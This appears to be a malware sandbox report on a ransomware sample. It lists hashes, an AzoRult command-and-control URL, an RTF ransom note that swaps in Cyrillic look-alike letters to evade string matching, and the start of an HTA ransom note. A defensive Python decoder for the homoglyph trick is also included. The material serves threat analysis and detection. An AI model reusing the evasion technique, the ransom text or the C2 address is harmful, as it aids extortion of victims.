General

  • Target: RNSM00361.7z
  • Size: 22.0MB
  • Sample: 241107-t9367ayldl
  • MD5: 178c5959b76748b2dc7b8375d12db80e
  • SHA1: f292fe20d20524d7d9ac5658f35c4b85bea72112
  • SHA256: f526608a5b27e9f3b290011efc5ed2098a48cbb522d15f7788dcda4158a23f49
  • SHA512: 9dc3274909bb0d6a39da8008d9c72ded281581f8ceab4e667670cf8e29fe5fca173ea7a2f53d1a34effeceac0105029202f83d83a1ecb1a548009aa81c4f18c0
  • SSDEEP: 393216:uM1EMy1RIPjtv22c20MTko/jMbyQ4kFnsMXzoBzapYxt3Ld:uQPyPI5vvc2ZuQkqMM9a+h

Malware Config

Extracted

Family: azorult

C2: http://admin.svapofit.com/azs/index.php

Extracted

Path: C:\Program Files (x86)\Microsoft Office\Office14\1033\#Decrypt_Files_ReadMe#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red0\green0\blue255;\red255\green0\blue0;\red255\green255\blue255;} {\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\ri-500\sa200\sl240\slmult1\qc\tx8804\lang1033\b\f0\fs28 WHAT HAPPENED WITH YOUR FILES?\lang1049\f1\par \pard\ri-74\sa200\sl240\slmult1\tx8378\lang1033\b0\f0\fs24 Your documents, databases, backups, network folders and other important files are encrypted with RSA-2048 and AES-128 ciphers.\par \pard\ri-74\sl240\slmult1\tx8378 More information about the RSA and AES can be found here:\par {\field{\*\fldinst{HYPERLINK "http://en.wikipedia.org/wiki/RSA_(cryptosystem"}}{\fldrslt{\ul\cf1 http://en.wikipedia.org/wiki/RSA_(cryptosystem}}}\f0\fs24 )\par \pard\ri-74\sa200\sl240\slmult1\tx8378{\field{\*\fldinst{HYPERLINK "http://en.wikipedia.org/wiki/Advanced_Encryption_Standard"}}{\fldrslt{\ul\cf1 http://en.wikipedia.org/wiki/Advanced_Encryption_Standard}}}\f0\fs24\par It m\lang1049\f1\'e5\'e0\lang1033\f0 ns th\lang1049\f1\'e0\lang1033\f0 t y\lang1049\f1\'ee\lang1033\f0 u will n\lang1049\f1\'ee\lang1033\f0 t b\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 bl\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 cc\lang1049\f1\'e5\lang1033\f0 ss th\lang1049\f1\'e5\lang1033\f0 m \lang1049\f1\'e0\lang1033\f0 n\lang1049\f1\'f3\lang1033\f0 m\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 until th\lang1049\f1\'e5\'f3\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pt\lang1049\f1\'e5\lang1033\f0 d with y\lang1049\f1\'ee\lang1033\f0 ur p\lang1049\f1\'e5\lang1033\f0 rs\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pti\lang1049\f1\'ee\lang1033\f0 n k\lang1049\f1\'e5\lang1033\f0 y! 
With\lang1049\f1\'ee\lang1033\f0 ut \lang1049\f1\'f3\'ee\lang1033\f0 ur p\lang1049\f1\'e5\lang1033\f0 rs\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l k\lang1049\f1\'e5\lang1033\f0 y \lang1049\f1\'e0\lang1033\f0 nd s\lang1049\f1\'f0\'e5\lang1033\f0 ci\lang1049\f1\'e0\lang1033\f0 l s\lang1049\f1\'ee\lang1033\f0 ftw\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 d\lang1049\f1\'e0\lang1033\f0 t\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'ee\lang1033\f0 v\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 is imp\lang1049\f1\'ee\lang1033\f0 ssibl\lang1049\f1\'e5\lang1033\f0 ! If y\lang1049\f1\'ee\lang1033\f0 u will f\lang1049\f1\'ee\lang1033\f0 ll\lang1049\f1\'ee\lang1033\f0 w \lang1049\f1\'ee\lang1033\f0 ur instru\lang1049\f1\'f1\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 ns, w\lang1049\f1\'e5\lang1033\f0 gu\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'e0\lang1033\f0 nt\lang1049\f1\'e5\'e5\lang1033\f0 th\lang1049\f1\'e0\lang1033\f0 t y\lang1049\f1\'ee\lang1033\f0 u c\lang1049\f1\'e0\lang1033\f0 n d\lang1049\f1\'e5\'f1\lang1033\f0 ry\lang1049\f1\'f0\lang1033\f0 t \lang1049\f1\'e0\lang1033\f0 ll y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s qui\lang1049\f1\'f1\lang1033\f0 kly \lang1049\f1\'e0\lang1033\f0 nd s\lang1049\f1\'e0\lang1033\f0 f\lang1049\f1\'e5\lang1033\f0 ly!\par \pard\ri-74\sl240\slmult1\tx8378 =====================================================================\par \pard\ri-74\sa200\sl240\slmult1\tx8378\lang1049\f1\'d3\'ee\lang1033\f0 u r\lang1049\f1\'e5\'e0\lang1033\f0 l\lang1049\f1\'f3\lang1033\f0 w\lang1049\f1\'e0\lang1033\f0 nt t\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 st\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s? 
Pl\lang1049\f1\'e5\'e0\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 writ\lang1049\f1\'e5\lang1033\f0 us t\lang1049\f1\'ee\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 -m\lang1049\f1\'e0\lang1033\f0 ils:\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par \pard\sa200\sl240\slmult1 [email protected]\par \b0\fs24 In subj\lang1049\f1\'e5\lang1033\f0 ct lin\lang1049\f1\'e5 \'ee\lang1033\f0 f your m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 writ\lang1049\f1\'e5\lang1033\f0 y\lang1049\f1\'ee\lang1033\f0 ur p\lang1049\f1\'e5\lang1033\f0 rs\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l ID:\par \b\fs28 334F3FDC2140DC83\par \cf2 W\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\'f1\'ee\lang1033\f0 mm\lang1049\f1\'e5\lang1033\f0 nd y\lang1049\f1\'ee\lang1033\f0 u t\lang1049\f1\'ee\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 nd y\lang1049\f1\'ee\lang1033\f0 ur m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'ce\lang1033\f0 N \lang1049\f1\'c5\'c0\'d1\lang1033\f0 H \lang1049\f1\'ee\lang1033\f0 f \lang1049\f1\'ce\lang1033\f0 UR 3 \lang1049\f1\'c5\'cc\'c0\lang1033\f0 ILS, du\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 f\lang1049\f1\'e0\'f1\lang1033\f0 t th\lang1049\f1\'e0\lang1033\f0 t th\lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\'f3\lang1033\f0 n\lang1049\f1\'ee\lang1033\f0 t r\lang1049\f1\'e5\'e0\lang1033\f0 ch th\lang1049\f1\'e5\lang1033\f0 ir int\lang1049\f1\'e5\lang1033\f0 nd\lang1049\f1\'e5\lang1033\f0 d r\lang1049\f1\'e5\lang1033\f0 cipi\lang1049\f1\'e5\lang1033\f0 nt f\lang1049\f1\'ee\lang1033\f0 r \lang1049\f1\'e0\lang1033\f0 v\lang1049\f1\'e0\lang1033\f0 ri\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'f3\lang1033\f0 \lang1049\f1\'ee\lang1033\f0 f r\lang1049\f1\'e5\'e0\lang1033\f0 
s\lang1049\f1\'ee\lang1033\f0 ns!\cf0\par \pard\ri-74\sl240\slmult1\tx8378\b0\fs24 =====================================================================\par \pard\ri-74\sa200\sl240\slmult1\tx8378 If \lang1049\f1\'f3\'ee\lang1033\f0 u pr\lang1049\f1\'e5\lang1033\f0 f\lang1049\f1\'e5\lang1033\f0 r liv\lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 ging y\lang1049\f1\'ee\lang1033\f0 u c\lang1049\f1\'e0\lang1033\f0 n s\lang1049\f1\'e5\lang1033\f0 nd us Bitm\lang1049\f1\'e5\lang1033\f0 nss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 s fr\lang1049\f1\'ee\lang1033\f0 m \lang1049\f1\'e0\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 b br\lang1049\f1\'ee\lang1033\f0 ws\lang1049\f1\'e5\lang1033\f0 r thr\lang1049\f1\'ee\lang1033\f0 ugh th\lang1049\f1\'e5\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 bp\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 {\field{\*\fldinst{HYPERLINK "https://bitmsg.me"}}{\fldrslt{\ul\cf1 https://bitmsg.me}}}\f0\fs24 . B\lang1049\f1\'e5\lang1033\f0 l\lang1049\f1\'ee\lang1033\f0 w is \lang1049\f1\'e0\lang1033\f0 tut\lang1049\f1\'ee\lang1033\f0 ri\lang1049\f1\'e0\lang1033\f0 l \lang1049\f1\'ee\lang1033\f0 n h\lang1049\f1\'ee\lang1033\f0 w t\lang1049\f1\'ee\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 nd bitm\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 vi\lang1049\f1\'e0\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 b br\lang1049\f1\'ee\lang1033\f0 ws\lang1049\f1\'e5\lang1033\f0 r:\par 1. 
\lang1049\f1\'ce\lang1033\f0 p\lang1049\f1\'e5\lang1033\f0 n in y\lang1049\f1\'ee\lang1033\f0 ur br\lang1049\f1\'ee\lang1033\f0 ws\lang1049\f1\'e5\lang1033\f0 r th\lang1049\f1\'e5\lang1033\f0 link {\field{\*\fldinst{HYPERLINK "https://bitmsg.me/users/sign_up"}}{\fldrslt{\ul\cf1 https://bitmsg.me/users/sign_up}}}\f0\fs24 \lang1049\f1\'e0\lang1033\f0 nd m\lang1049\f1\'e0\lang1033\f0 k\lang1049\f1\'e5\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 gistr\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n b\lang1049\f1\'f3\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 ring n\lang1049\f1\'e0\lang1033\f0 m\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\lang1033\f0 il \lang1049\f1\'e0\lang1033\f0 nd p\lang1049\f1\'e0\lang1033\f0 ssw\lang1049\f1\'ee\lang1033\f0 rd.\par 2. \lang1049\f1\'d3\'ee\lang1033\f0 u must c\lang1049\f1\'ee\lang1033\f0 nfirm th\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 gistr\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n, r\lang1049\f1\'e5\lang1033\f0 turn t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'f3\'ee\lang1033\f0 ur \lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\lang1033\f0 il \lang1049\f1\'e0\lang1033\f0 nd f\lang1049\f1\'ee\lang1033\f0 ll\lang1049\f1\'ee\lang1033\f0 w th\lang1049\f1\'e5\lang1033\f0 instructi\lang1049\f1\'ee\lang1033\f0 ns th\lang1049\f1\'e0\lang1033\f0 t w\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 nt t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'f3\'ee\lang1033\f0 u.\par 3. 
R\lang1049\f1\'e5\lang1033\f0 turn t\lang1049\f1\'ee\lang1033\f0 sit\lang1049\f1\'e5\lang1033\f0 \lang1049\f1\'e0\lang1033\f0 nd \lang1049\f1\'f1\lang1033\f0 lick \lang1049\f1 "\lang1033\f0 L\lang1049\f1\'ee\lang1033\f0 gin\lang1049\f1 "\lang1033\f0 l\lang1049\f1\'e0\lang1033\f0 b\lang1049\f1\'e5\lang1033\f0 l \lang1049\f1\'ee\lang1033\f0 r us\lang1049\f1\'e5\lang1033\f0 link {\field{\*\fldinst{HYPERLINK "https://bitmsg.me/users/sign_in"}}{\fldrslt{\ul\cf1 https://bitmsg.me/users/sign_in}}}\f0\fs24 , \lang1049\f1\'e5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 r \lang1049\f1\'f3\'ee\lang1033\f0 ur \lang1049\f1\'e5\lang1033\f0 m\lang1049\f1\'e0\lang1033\f0 il \lang1049\f1\'e0\lang1033\f0 nd p\lang1049\f1\'e0\lang1033\f0 ssw\lang1049\f1\'ee\lang1033\f0 rd \lang1049\f1\'e0\lang1033\f0 nd click th\lang1049\f1\'e5\lang1033\f0 "Sign in" butt\lang1049\f1\'ee\lang1033\f0 n. \lang1049\f1 \lang1033\f0\par 4. \lang1049\f1\'d1\lang1033\f0 lick th\lang1049\f1\'e5\lang1033\f0 "\lang1049\f1\'d1\lang1033\f0 r\lang1049\f1\'e5\'e0\lang1033\f0 t\lang1049\f1\'e5\lang1033\f0 R\lang1049\f1\'e0\lang1033\f0 nd\lang1049\f1\'ee\lang1033\f0 m \lang1049\f1\'e0\lang1033\f0 ddr\lang1049\f1\'e5\lang1033\f0 ss" butt\lang1049\f1\'ee\lang1033\f0 n.\par 5. 
\lang1049\f1\'d1\lang1033\f0 lick th\lang1049\f1\'e5\lang1033\f0 "N\lang1049\f1\'e5\lang1033\f0 w m\lang1049\f1\'e0\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 " butt\lang1049\f1\'ee\lang1033\f0 n.\par \b S\lang1049\f1\'e5\lang1033\f0 nding m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 :\par T\lang1049\f1\'ee\lang1033\f0 :\b0 \lang1049\f1\'c5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 r \lang1049\f1\'e0\lang1033\f0 ddr\lang1049\f1\'e5\lang1033\f0 ss: \b BM-2cVeq4HtLaXPGTamXgv5rvwDjypapmy8ir\par \pard\sa200\sl240\slmult1 Subj\lang1049\f1\'e5\'f1\lang1033\f0 t:\b0 \lang1049\f1\'c5\lang1033\f0 nt\lang1049\f1\'e5\lang1033\f0 r \lang1049\f1\'f3\'ee\lang1033\f0 ur ID: \b 334F3FDC2140DC83\par M\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 : \b0 D\lang1049\f1\'e5\lang1033\f0 scrib\lang1049\f1\'e5\lang1033\f0 wh\lang1049\f1\'e0\lang1033\f0 t \lang1049\f1\'f3\'ee\lang1033\f0 u think n\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\lang1049\f1\'d1\lang1033\f0 lick th\lang1049\f1\'e5\lang1033\f0 "S\lang1049\f1\'e5\lang1033\f0 nd m\lang1049\f1\'e5\lang1033\f0 ss\lang1049\f1\'e0\lang1033\f0 g\lang1049\f1\'e5\lang1033\f0 " butt\lang1049\f1\'ee\lang1033\f0 n.\par \pard\ri-74\sl240\slmult1\tx8378 =====================================================================\par \pard\sa200\sl240\slmult1\cf2\b\fs28 Pl\lang1049\f1\'e5\'e0\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 , writ\lang1049\f1\'e5\lang1033\f0 us in \lang1049\f1\'c5\lang1033\f0 nglish \lang1049\f1\'ee\lang1033\f0 r us\lang1049\f1\'e5\lang1033\f0 pr\lang1049\f1\'ee\lang1033\f0 f\lang1049\f1\'e5\lang1033\f0 ssi\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1\'e0\lang1033\f0 l tr\lang1049\f1\'e0\lang1033\f0 nsl\lang1049\f1\'e0\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 r!\par 
\pard\ri-74\sa200\sl240\slmult1\tx8378 If y\lang1049\f1\'ee\lang1033\f0 u w\lang1049\f1\'e0\lang1033\f0 nt t\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 st\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s, y\lang1049\f1\'ee\lang1033\f0 u h\lang1049\f1\'e0\lang1033\f0 v\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 p\lang1049\f1\'e0\lang1033\f0 y f\lang1049\f1\'ee\lang1033\f0 r d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pti\lang1049\f1\'ee\lang1033\f0 n in Bit\lang1049\f1\'f1\'ee\lang1033\f0 ins or with \lang1049\f1\'ee\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 r top \lang1049\f1\'f1\lang1033\f0 r\lang1049\f1\'f3\lang1033\f0 pt\lang1049\f1\'ee\'f1\lang1033\f0 urr\lang1049\f1\'e5\lang1033\f0 nc\lang1049\f1\'f3\lang1033\f0 .\par Th\lang1049\f1\'e5\lang1033\f0 pric\lang1049\f1\'e5\lang1033\f0 d\lang1049\f1\'e5\'f0\'e5\lang1033\f0 nds \lang1049\f1\'ee\lang1033\f0 n h\lang1049\f1\'ee\lang1033\f0 w f\lang1049\f1\'e0\lang1033\f0 st \lang1049\f1\'f3\'ee\lang1033\f0 u writ\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 us!\par \pard\sa200\sl240\slmult1\cf0\b0\fs24 Your message will be as confirmation you are ready to pay for decryption key. 
After the payment you will get the decryption tool with instructions that will decrypt all your files including network folders.\par T\lang1049\f1\'ee\lang1033\f0 c\lang1049\f1\'ee\lang1033\f0 nfirm th\lang1049\f1\'e0\lang1033\f0 t w\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'e0\lang1033\f0 n d\lang1049\f1\'e5\'f1\lang1033\f0 ry\lang1049\f1\'f0\lang1033\f0 t y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s y\lang1049\f1\'ee\lang1033\f0 u c\lang1049\f1\'e0\lang1033\f0 n s\lang1049\f1\'e5\lang1033\f0 nd us up t\lang1049\f1\'ee\lang1033\f0 3 fil\lang1049\f1\'e5\lang1033\f0 s f\lang1049\f1\'ee\lang1033\f0 r fr\lang1049\f1\'e5\'e5\lang1033\f0 d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\'f0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n. Pl\lang1049\f1\'e5\'e0\lang1033\f0 s\lang1049\f1\'e5\lang1033\f0 n\lang1049\f1\'ee\lang1033\f0 te th\lang1049\f1\'e0\lang1033\f0 t fil\lang1049\f1\'e5\lang1033\f0 s f\lang1049\f1\'ee\lang1033\f0 r fr\lang1049\f1\'e5\'e5\lang1033\f0 d\lang1049\f1\'e5\'f1\lang1033\f0 r\lang1049\f1\'f3\'f0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n must N\lang1049\f1\'ce\lang1033\f0 T c\lang1049\f1\'ee\lang1033\f0 nt\lang1049\f1\'e0\lang1033\f0 in \lang1049\f1\'e0\lang1033\f0 n\lang1049\f1\'f3\lang1033\f0 v\lang1049\f1\'e0\lang1033\f0 lu\lang1049\f1\'e0\lang1033\f0 bl\lang1049\f1\'e5\lang1033\f0 inf\lang1049\f1\'ee\lang1033\f0 rm\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n \lang1049\f1\'e0\lang1033\f0 nd th\lang1049\f1\'e5\lang1033\f0 ir t\lang1049\f1\'ee\lang1033\f0 t\lang1049\f1\'e0\lang1033\f0 l siz\lang1049\f1\'e5\lang1033\f0 must b\lang1049\f1\'e5\lang1033\f0 l\lang1049\f1\'e5\lang1033\f0 ss th\lang1049\f1\'e0\lang1033\f0 n 5Mb.\par Y\lang1049\f1\'ee\lang1033\f0 u h\lang1049\f1\'e0\lang1033\f0 v\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 sp\lang1049\f1\'ee\lang1033\f0 nd \lang1049\f1\'e0\lang1033\f0 s s\lang1049\f1\'ee\'ee\lang1033\f0 n \lang1049\f1\'e0\lang1033\f0 
s p\lang1049\f1\'ee\lang1033\f0 ssibl\lang1049\f1\'e5\lang1033\f0 t\lang1049\f1\'ee\lang1033\f0 \lang1049\f1\'e5\lang1033\f0 nsur\lang1049\f1\'e5\lang1033\f0 th\lang1049\f1\'e5\lang1033\f0 r\lang1049\f1\'e5\lang1033\f0 st\lang1049\f1\'ee\lang1033\f0 r\lang1049\f1\'e0\lang1033\f0 ti\lang1049\f1\'ee\lang1033\f0 n\lang1049\f1 \'ee\lang1033\f0 f y\lang1049\f1\'ee\lang1033\f0 ur fil\lang1049\f1\'e5\lang1033\f0 s, b\lang1049\f1\'e5\lang1033\f0 c\lang1049\f1\'e0\lang1033\f0 us\lang1049\f1\'e5\lang1033\f0 w\lang1049\f1\'e5\lang1033\f0 w\lang1049\f1\'ee\lang1033\f0 nt k\lang1049\f1\'e5\'e5\lang1033\f0 p y\lang1049\f1\'ee\lang1033\f0 ur d\lang1049\f1\'e5\lang1033\f0 cr\lang1049\f1\'f3\lang1033\f0 pti\lang1049\f1\'ee\lang1033\f0 n k\lang1049\f1\'e5\lang1033\f0 ys \lang1049\f1\'e0\lang1033\f0 t \lang1049\f1\'ee\lang1033\f0 ur s\lang1049
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in
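The RTF above deserves a second look before anyone writes a string rule for it. The header declares code page 1251 and a second font with charset 204 (Cyrillic), and most words in the body carry at least one cp1251 escape (\'e0, \'e5, \'ee, \'f0, \'f1, \'f3 and the capitals \'c0, \'c5, \'cc, \'ce, \'d1, \'d3) in place of a Latin a, e, o, p, c, y or their capitals. Rendered, the note reads fine to a victim, but the text contains Cyrillic letters where a detection rule expects ASCII, so a match on "decrypt" or "files" never fires. The block below is an added example, my own code rather than anything from the sandbox or the malware: a minimal RTF-to-text pass that decodes the \'xx escapes with the declared code page, drops the font and colour tables and the HYPERLINK field instructions, and then folds the Cyrillic look-alikes back to Latin. The RTF inside it is constructed in the same style as the note; it is not the note itself.

```python
import re
from typing import Dict, List

# cp1251 letters the note substitutes for Latin ones (as seen in its escapes),
# plus a few look-alikes beyond what this note uses (assumption: same trick,
# other letters).
HOMOGLYPHS: Dict[str, str] = {
    "\u0430": "a",  # \'e0  а
    "\u0435": "e",  # \'e5  е
    "\u043e": "o",  # \'ee  о
    "\u0440": "p",  # \'f0  р
    "\u0441": "c",  # \'f1  с
    "\u0443": "y",  # \'f3  у
    "\u0410": "A",  # \'c0  А
    "\u0415": "E",  # \'c5  Е
    "\u041c": "M",  # \'cc  М
    "\u041e": "O",  # \'ce  О
    "\u0421": "C",  # \'d1  С
    "\u0423": "Y",  # \'d3  У
    # not used by this note, but routinely swapped by the same trick
    "\u0445": "x", "\u0425": "X", "\u0412": "B", "\u041a": "K",
    "\u041d": "H", "\u0420": "P", "\u0422": "T",
}

# One token at a time: \'xx hex escape | control word (+ optional numeric
# argument, optional delimiter space) | control symbol | brace | plain text.
TOKEN = re.compile(
    r"\\'([0-9a-fA-F]{2})|\\([a-zA-Z]+)(-?\d+)? ?|\\(.)|([{}])|([^\\{}]+)"
)
# Destination groups whose content never reaches the reader.
SKIP_GROUPS = {"fonttbl", "colortbl", "stylesheet", "info", "fldinst"}
NEWLINE_WORDS = {"par", "line"}


def rtf_to_text(rtf: str, codepage: str = "cp1251") -> str:
    """Render the visible text of a small RTF document.

    Covers what ransom notes like this one use: \\'xx byte escapes decoded
    with the declared code page, \\par line breaks, and skipping of the
    font/colour tables, \\* (ignorable) groups and HYPERLINK field code.
    Not a general RTF reader.
    """
    out: List[str] = []
    depth = 0               # current group nesting
    skip_depth = 0          # nesting level of the group being discarded (0 = none)
    at_group_start = False  # True right after '{' so the first control can mark the group

    for hexbyte, word, _num, sym, brace, text in TOKEN.findall(rtf):
        if brace == "{":
            depth += 1
            at_group_start = not skip_depth
            continue
        if brace == "}":
            if skip_depth == depth:
                skip_depth = 0
            depth -= 1
            at_group_start = False
            continue
        if skip_depth:
            continue
        if word:
            if at_group_start and word in SKIP_GROUPS:
                skip_depth = depth
            elif word in NEWLINE_WORDS:
                out.append("\n")
        elif sym:
            if at_group_start and sym == "*":
                skip_depth = depth
            elif sym in "\\{}":
                out.append(sym)
        elif hexbyte:
            out.append(bytes([int(hexbyte, 16)]).decode(codepage))
        elif text:
            out.append(text.replace("\r", "").replace("\n", ""))
        at_group_start = False
    return "".join(out)


def normalize_homoglyphs(text: str) -> str:
    """Fold Cyrillic look-alike letters back to their Latin counterparts."""
    return "".join(HOMOGLYPHS.get(ch, ch) for ch in text)


def decode_note(rtf: str) -> str:
    """Rendered note text with the homoglyph trick undone; match rules on this."""
    return normalize_homoglyphs(rtf_to_text(rtf))


# Constructed sample in the same style as the note (not the note itself).
SAMPLE_RTF = (
    r"{\rtf1\ansi\ansicpg1251\deff0\deflang1049"
    r"{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}}"
    r"{\*\generator Msftedit 5.41.21.2510;}"
    r"\pard\b\f0\fs28 WHAT HAPPENED WITH YOUR FILES?\b0\par "
    r"It m\f1\'e5\'e0\f0 ns th\f1\'e0\f0 t y\f1\'ee\f0 u c\f1\'e0\f0 n d\f1\'e5\'f1\f0 ry\f1\'f0\f0 t "
    r'{\field{\*\fldinst{HYPERLINK "https://example.invalid"}}{\fldrslt{\ul\cf1 https://example.invalid}}}'
    r"\par}"
)

if __name__ == "__main__":
    rendered = rtf_to_text(SAMPLE_RTF)
    print(repr(rendered))            # Cyrillic letters survive rendering
    print("decrypt" in rendered)     # False: a plain string rule misses the word
    print(decode_note(SAMPLE_RTF))   # ... and hits once the letters are folded back
```

One caveat when feeding the copy on this page into it: per the RTF specification a single space after a control word is a delimiter and is dropped, so `\f0 ns` yields `ns`. Word writes two spaces where a real space follows a control word, and this page appears to have collapsed runs of whitespace, so some words in this copy will run together after decoding; the original file on disk does not have that problem.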

Extracted

Path: C:\Users\Admin\Documents\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; } h2 { color: #555; text-align: center; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 1em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } 